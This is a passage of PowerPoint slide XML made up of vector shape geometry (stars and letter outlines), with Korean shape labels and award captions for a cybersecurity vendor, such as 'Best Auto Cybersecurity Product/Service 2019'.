                    <a:gd name="connsiteY1" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 114300"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX3" fmla="*/ 49721 w 114300"/>
                    <a:gd name="connsiteY3" fmla="*/ 83344 h 133350"/>
                    <a:gd name="connsiteX4" fmla="*/ 49721 w 114300"/>
                    <a:gd name="connsiteY4" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX5" fmla="*/ 72866 w 114300"/>
                    <a:gd name="connsiteY5" fmla="*/ 137160 h 133350"/>
                    <a:gd name="connsiteX6" fmla="*/ 72866 w 114300"/>
                    <a:gd name="connsiteY6" fmla="*/ 83344 h 133350"/>
                    <a:gd name="connsiteX7" fmla="*/ 122396 w 114300"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 133350"/>
                    <a:gd name="connsiteX8" fmla="*/ 96488 w 114300"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 1333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14300" h="133350">
                      <a:moveTo>
                        <a:pt x="61913" y="61436"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="26860" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="49721" y="83344"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="49721" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72866" y="137160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72866" y="83344"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="122396" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96488" y="0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7" name="자유형: 도형 99">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39CE165-E217-DE4E-A8A8-9E842702FBF6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8280819" y="3477874"/>
                  <a:ext cx="85725" cy="85725"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17335 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 86773 h 85725"/>
                    <a:gd name="connsiteX1" fmla="*/ 45529 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 69342 h 85725"/>
                    <a:gd name="connsiteX2" fmla="*/ 73724 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 86773 h 85725"/>
                    <a:gd name="connsiteX3" fmla="*/ 65913 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 54578 h 85725"/>
                    <a:gd name="connsiteX4" fmla="*/ 91154 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 33147 h 85725"/>
                    <a:gd name="connsiteX5" fmla="*/ 58102 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 30671 h 85725"/>
                    <a:gd name="connsiteX6" fmla="*/ 45529 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX7" fmla="*/ 32956 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 30671 h 85725"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 33147 h 85725"/>
                    <a:gd name="connsiteX9" fmla="*/ 25241 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 54578 h 8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5725" h="85725">
                      <a:moveTo>
                        <a:pt x="17335" y="86773"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="45529" y="69342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73724" y="86773"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="65913" y="54578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="91154" y="33147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58102" y="30671"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45529" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32956" y="30671"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="33147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25241" y="54578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68" name="자유형: 도형 100">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7746BD-74A1-5143-B5A0-2BF583143188}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7385374" y="3477874"/>
                  <a:ext cx="85725" cy="85725"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17431 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 86773 h 85725"/>
                    <a:gd name="connsiteX1" fmla="*/ 45625 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 69342 h 85725"/>
                    <a:gd name="connsiteX2" fmla="*/ 73819 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 86773 h 85725"/>
                    <a:gd name="connsiteX3" fmla="*/ 66008 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 54578 h 85725"/>
                    <a:gd name="connsiteX4" fmla="*/ 91250 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 33147 h 85725"/>
                    <a:gd name="connsiteX5" fmla="*/ 58198 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 30671 h 85725"/>
                    <a:gd name="connsiteX6" fmla="*/ 45625 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX7" fmla="*/ 33052 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 30671 h 85725"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 33147 h 85725"/>
                    <a:gd name="connsiteX9" fmla="*/ 25336 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 54578 h 8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5725" h="85725">
                      <a:moveTo>
                        <a:pt x="17431" y="86773"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="45625" y="69342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73819" y="86773"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66008" y="54578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="91250" y="33147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58198" y="30671"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45625" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33052" y="30671"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="33147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25336" y="54578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239" name="Shape 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE28F857-B722-5C4B-B8EF-0A2C8AC9E935}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7306365" y="6103178"/>
                <a:ext cx="66996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>
                <a:defPPr>
                  <a:defRPr lang="en-US"/>
                </a:defPPr>
                <a:lvl1pPr algn="ctr">
                  <a:defRPr sz="599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나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                    <a:cs typeface="Arial"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr lvl="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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Cybersecurity Excellence Awards Winner 2018</a:t>
                </a:r>
                <a:endParaRPr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  <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="272" name="Group 271">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E14E19C-D5DF-614B-8D5F-6DEC2AFD9865}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="739309" y="5654790"/>
              <a:ext cx="760212" cy="721982"/>
              <a:chOff x="2263309" y="5654790"/>
              <a:chExt cx="760212" cy="721982"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="273" name="Shape 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE85F3D8-B255-9143-A573-EC05CF9C5D7B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2263309" y="6099773"/>
                <a:ext cx="760212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>
                <a:defPPr>
                  <a:defRPr lang="en-US"/>
                </a:defPPr>
                <a:lvl1pPr algn="ctr">
                  <a:defRPr sz="599">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                    <a:cs typeface="Arial"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr lvl="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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TU-Automotive Awards</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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Best Auto Cybersecurity</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="6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Product/Service 2019</a:t>
                </a:r>
                <a:endParaRPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="6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  <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="274" name="그래픽 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5447D6-AA11-4443-BCE9-FFA2A68F35C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2288981" y="5654790"/>
                <a:ext cx="714118" cy="273260"/>
                <a:chOff x="2408118" y="3868190"/>
                <a:chExt cx="1866900" cy="714375"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="275" name="자유형: 도형 187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A7A4B0-6AF6-E64C-8191-261E4111F1CC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2446408" y="3868190"/>
                  <a:ext cx="247650" cy="238125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 28385 w 247650"/>
                    <a:gd name="connsiteY0" fmla="*/ 225743 h 238125"/>
                    <a:gd name="connsiteX1" fmla="*/ 110204 w 247650"/>
                    <a:gd name="connsiteY1" fmla="*/ 195358 h 238125"/>
                    <a:gd name="connsiteX2" fmla="*/ 181547 w 247650"/>
                    <a:gd name="connsiteY2" fmla="*/ 245555 h 238125"/>
                    <a:gd name="connsiteX3" fmla="*/ 177927 w 247650"/>
                    <a:gd name="connsiteY3" fmla="*/ 158401 h 238125"/>
                    <a:gd name="connsiteX4" fmla="*/ 247745 w 247650"/>
                    <a:gd name="connsiteY4" fmla="*/ 106109 h 238125"/>
                    <a:gd name="connsiteX5" fmla="*/ 163735 w 247650"/>
                    <a:gd name="connsiteY5" fmla="*/ 82582 h 238125"/>
                    <a:gd name="connsiteX6" fmla="*/ 135541 w 247650"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 238125"/>
                    <a:gd name="connsiteX7" fmla="*/ 87154 w 247650"/>
                    <a:gd name="connsiteY7" fmla="*/ 72581 h 238125"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 247650"/>
                    <a:gd name="connsiteY8" fmla="*/ 73914 h 238125"/>
                    <a:gd name="connsiteX9" fmla="*/ 54102 w 247650"/>
                    <a:gd name="connsiteY9" fmla="*/ 142304 h 2381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47650" h="238125">
                      <a:moveTo>
                        <a:pt x="28385" y="225743"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="110204" y="195358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="181547" y="245555"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="177927" y="158401"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247745" y="106109"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163735" y="82582"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135541" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="87154" y="72581"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54102" y="142304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76" name="자유형: 도형 188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53846756-A77B-F949-B86E-B8E22B2E6AEE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2408118" y="4146034"/>
                  <a:ext cx="190500" cy="190500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 110871 w 190500"/>
                    <a:gd name="connsiteY0" fmla="*/ 155353 h 190500"/>
                    <a:gd name="connsiteX1" fmla="*/ 176498 w 190500"/>
                    <a:gd name="connsiteY1" fmla="*/ 178403 h 190500"/>
                    <a:gd name="connsiteX2" fmla="*/ 154877 w 190500"/>
                    <a:gd name="connsiteY2" fmla="*/ 112300 h 190500"/>
                    <a:gd name="connsiteX3" fmla="*/ 197072 w 190500"/>
                    <a:gd name="connsiteY3" fmla="*/ 57055 h 190500"/>
                    <a:gd name="connsiteX4" fmla="*/ 127540 w 190500"/>
                    <a:gd name="connsiteY4" fmla="*/ 57150 h 190500"/>
                    <a:gd name="connsiteX5" fmla="*/ 88011 w 190500"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 190500"/>
                    <a:gd name="connsiteX6" fmla="*/ 66580 w 190500"/>
                    <a:gd name="connsiteY6" fmla="*/ 66199 h 190500"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 190500"/>
                    <a:gd name="connsiteY7" fmla="*/ 86106 h 190500"/>
                    <a:gd name="connsiteX8" fmla="*/ 56293 w 190500"/>
                    <a:gd name="connsiteY8" fmla="*/ 126873 h 190500"/>
                    <a:gd name="connsiteX9" fmla="*/ 54673 w 190500"/>
                    <a:gd name="connsiteY9" fmla="*/ 196406 h 190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0500" h="190500">
                      <a:moveTo>
                        <a:pt x="110871" y="155353"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="176498" y="178403"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="154877" y="112300"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197072" y="57055"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127540" y="57150"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="88011" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66580" y="66199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="86106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56293" y="126873"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54673" y="196406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77" name="자유형: 도형 189">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D11E56-D12C-6D41-BE11-5BF44A6C2097}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2518989" y="4374634"/>
                  <a:ext cx="133350" cy="123825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 110395 w 133350"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX1" fmla="*/ 68104 w 133350"/>
                    <a:gd name="connsiteY1" fmla="*/ 23241 h 123825"/>
                    <a:gd name="connsiteX2" fmla="*/ 24955 w 133350"/>
                    <a:gd name="connsiteY2" fmla="*/ 1619 h 123825"/>
                    <a:gd name="connsiteX3" fmla="*/ 34004 w 133350"/>
                    <a:gd name="connsiteY3" fmla="*/ 49054 h 123825"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 133350"/>
                    <a:gd name="connsiteY4" fmla="*/ 83344 h 123825"/>
                    <a:gd name="connsiteX5" fmla="*/ 47911 w 133350"/>
                    <a:gd name="connsiteY5" fmla="*/ 89440 h 123825"/>
                    <a:gd name="connsiteX6" fmla="*/ 70104 w 133350"/>
                    <a:gd name="connsiteY6" fmla="*/ 132398 h 123825"/>
                    <a:gd name="connsiteX7" fmla="*/ 90678 w 133350"/>
                    <a:gd name="connsiteY7" fmla="*/ 88678 h 123825"/>
                    <a:gd name="connsiteX8" fmla="*/ 138303 w 133350"/>
                    <a:gd name="connsiteY8" fmla="*/ 80867 h 123825"/>
                    <a:gd name="connsiteX9" fmla="*/ 103156 w 133350"/>
                    <a:gd name="connsiteY9" fmla="*/ 47720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33350" h="123825">
                      <a:moveTo>
                        <a:pt x="110395" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="68104" y="23241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24955" y="1619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34004" y="49054"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="83344"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47911" y="89440"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="70104" y="132398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="90678" y="88678"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="138303" y="80867"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="103156" y="4772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78" name="자유형: 도형 190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD4D312-DCEB-284D-AF1C-0D3101201A20}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2692439" y="4500650"/>
                  <a:ext cx="76200" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 85439 w 76200"/>
                    <a:gd name="connsiteY0" fmla="*/ 35433 h 76200"/>
                    <a:gd name="connsiteX1" fmla="*/ 56388 w 76200"/>
                    <a:gd name="connsiteY1" fmla="*/ 28099 h 76200"/>
                    <a:gd name="connsiteX2" fmla="*/ 45910 w 76200"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 76200"/>
                    <a:gd name="connsiteX3" fmla="*/ 29909 w 76200"/>
                    <a:gd name="connsiteY3" fmla="*/ 25432 h 76200"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 76200"/>
                    <a:gd name="connsiteY4" fmla="*/ 26670 h 76200"/>
                    <a:gd name="connsiteX5" fmla="*/ 19241 w 76200"/>
                    <a:gd name="connsiteY5" fmla="*/ 49721 h 76200"/>
                    <a:gd name="connsiteX6" fmla="*/ 11144 w 76200"/>
                    <a:gd name="connsiteY6" fmla="*/ 78581 h 76200"/>
                    <a:gd name="connsiteX7" fmla="*/ 38957 w 76200"/>
                    <a:gd name="connsiteY7" fmla="*/ 67437 h 76200"/>
                    <a:gd name="connsiteX8" fmla="*/ 64008 w 76200"/>
                    <a:gd name="connsiteY8" fmla="*/ 84011 h 76200"/>
                    <a:gd name="connsiteX9" fmla="*/ 61912 w 76200"/>
                    <a:gd name="connsiteY9" fmla="*/ 54102 h 76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6200" h="76200">
                      <a:moveTo>
                        <a:pt x="85439" y="35433"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="56388" y="28099"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45910" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29909" y="25432"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26670"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19241" y="49721"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11144" y="78581"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38957" y="67437"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64008" y="84011"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="61912" y="54102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79" name="자유형: 도형 191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435757A8-72C9-424F-BC06-F628FAA780AF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2765020" y="4146034"/>
                  <a:ext cx="247650" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 99250 w 247650"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 247650"/>
                    <a:gd name="connsiteY1" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 60293 w 247650"/>
                    <a:gd name="connsiteY2" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 77724 w 247650"/>
                    <a:gd name="connsiteY3" fmla="*/ 206978 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 178498 w 247650"/>
                    <a:gd name="connsiteY4" fmla="*/ 206978 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 198311 w 247650"/>
                    <a:gd name="connsiteY5" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 253079 w 247650"/>
                    <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 154781 w 247650"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 99250 w 247650"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 90488 w 247650"/>
                    <a:gd name="connsiteY9" fmla="*/ 163259 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 128206 w 247650"/>
                    <a:gd name="connsiteY10" fmla="*/ 60103 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 165925 w 247650"/>
                    <a:gd name="connsiteY11" fmla="*/ 163259 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 90488 w 247650"/>
                    <a:gd name="connsiteY12" fmla="*/ 163259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7650" h="247650">
                      <a:moveTo>
                        <a:pt x="99250" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60293" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77724" y="206978"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178498" y="206978"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198311" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="253079" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="154781" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99250" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="90488" y="163259"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="128206" y="60103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165925" y="163259"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="90488" y="163259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0" name="자유형: 도형 192">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F881A84-B918-1D48-91F0-956221002AB4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2996858" y="4146034"/>
                  <a:ext cx="342900" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 294418 w 342900"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 242887 w 342900"/>
                    <a:gd name="connsiteY1" fmla="*/ 151829 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 192024 w 342900"/>
                    <a:gd name="connsiteY2" fmla="*/ 7715 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 156305 w 342900"/>
                    <a:gd name="connsiteY3" fmla="*/ 7715 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 105537 w 342900"/>
                    <a:gd name="connsiteY4" fmla="*/ 151829 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 55531 w 342900"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 342900"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 80962 w 342900"/>
                    <a:gd name="connsiteY7" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 126206 w 342900"/>
                    <a:gd name="connsiteY8" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 173831 w 342900"/>
                    <a:gd name="connsiteY9" fmla="*/ 109252 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 221456 w 342900"/>
                    <a:gd name="connsiteY10" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 268224 w 342900"/>
                    <a:gd name="connsiteY11" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 347662 w 342900"/>
                    <a:gd name="connsiteY12" fmla="*/ 0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342900" h="247650">
                      <a:moveTo>
                        <a:pt x="294418" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="242887" y="151829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="192024" y="7715"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156305" y="7715"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105537" y="151829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="55531" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80962" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
